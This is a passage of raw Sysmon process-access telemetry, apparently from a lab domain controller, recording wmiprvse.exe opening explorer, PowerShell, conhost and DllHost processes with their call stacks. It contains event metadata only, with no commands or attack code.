16:52:53.012{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D64-603E-81AA-00000000AD01}11880C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237706Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.012{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D64-603E-80AA-00000000AD01}5464C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237705Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.012{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-35AA-00000000AD01}14828C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237704Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.012{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237703Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.012{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CAF-603E-33AA-00000000AD01}8188C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237702Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.012{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237701Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.012{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237700Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.012{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237699Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.012{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237698Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.012{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237697Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.012{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237696Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.012{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237695Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.012{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237694Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.012{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237693Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.012{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237692Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.012{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237691Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.012{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237690Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.997{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237689Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.997{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237688Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.997{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237687Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 